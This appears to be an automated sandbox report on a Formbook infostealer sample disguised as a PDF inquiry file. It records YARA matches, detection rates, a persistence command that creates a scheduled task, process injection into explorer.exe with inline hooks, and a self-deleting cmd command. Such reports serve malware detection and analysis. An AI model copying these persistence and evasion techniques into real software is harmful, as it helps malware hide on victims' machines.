Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015620A0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01602B28
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FDBD2
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156EBB0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_016022AE
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01601D55
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01602D07
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01530D20
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154D5E0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_016025DD
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562581
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FD466
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154841F
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01601FF1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FD616
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01556E30
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01602EF7
Source: C:\Windows\explorer.exe	Code function: 10_2_04DFAA32
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF2CF2
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF2CEC
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF1072
Source: C:\Windows\explorer.exe	Code function: 10_2_04DFDA6F
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF1069
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF9862
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF5B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_04DFDB0E
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF8132
Source: C:\Windows\explorer.exe	Code function: 10_2_04DF5B22
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03342B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03341FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03296E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_033422AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03342EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03270D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03294120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03342D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03341D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_033420A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A02D87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A02D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A09E3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A09E40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A02FB0

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0327B150 appears 35 times
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: String function: 0153B150 appears 35 times

Source: INQUIRY 1820521 pdf.exe	Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688381627.000000000A140000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688381627.000000000A140000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000000.643263157.0000000000D52000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690617159.000000000B6A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688107123.0000000009F10000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll" vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690816411.0000000012120000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll2 vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.680653424.00000000015D8000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe	Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000006.00000000.674971623.0000000000392000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe	Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000007.00000000.675957885.00000000000A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe	Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000008.00000000.677042665.00000000001D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe	Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000009.00000000.678299200.0000000000942000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000009.00000002.728306510.00000000017BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727314494.0000000001437000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe	Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe

Source: INQUIRY 1820521 pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: INQUIRY 1820521 pdf.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: YAhcdYrYHFkNNf.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/4@3/3

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File created: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\EzfyYQgyGpxJcXHkudBezpt
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7085.tmp

Jump to behavior

Source: INQUIRY 1820521 pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: INQUIRY 1820521 pdf.exe	Virustotal: Detection: 39%
Source: INQUIRY 1820521 pdf.exe	Metadefender: Detection: 13%
Source: INQUIRY 1820521 pdf.exe	ReversingLabs: Detection: 41%

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File read: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: INQUIRY 1820521 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: INQUIRY 1820521 pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ipconfig.pdb source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY 1820521 pdf.exe, ipconfig.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_00D527CF push 00000052h; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_00D5269E push ds; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 6_2_0039269E push ds; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 6_2_003927CF push 00000052h; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 7_2_000A269E push ds; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 7_2_000A27CF push 00000052h; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 8_2_001D269E push ds; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 8_2_001D27CF push 00000052h; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0040CBD4 push ds; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0041CEB5 push eax; ret
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0041CF6C push eax; ret
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0041CF02 push eax; ret
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0041CF0B push eax; ret
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0041CFBA push eax; ret
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0094269E push ds; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_009427CF push 00000052h; iretd
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0158D0D1 push ecx; ret
Source: C:\Windows\explorer.exe	Code function: 10_2_04DFE3E6 pushad ; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032CD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A0CBD4 push ds; iretd
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A1CEB5 push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A1CFBA push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A1CF02 push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A1CF0B push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A1CF6C push eax; ret

Source: initial sample	Static PE information: section name: .text entropy: 7.49655840913
Source: initial sample	Static PE information: section name: .text entropy: 7.49655840913

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

File created: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xE3

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process information set: NOOPENFILEERRORBOX
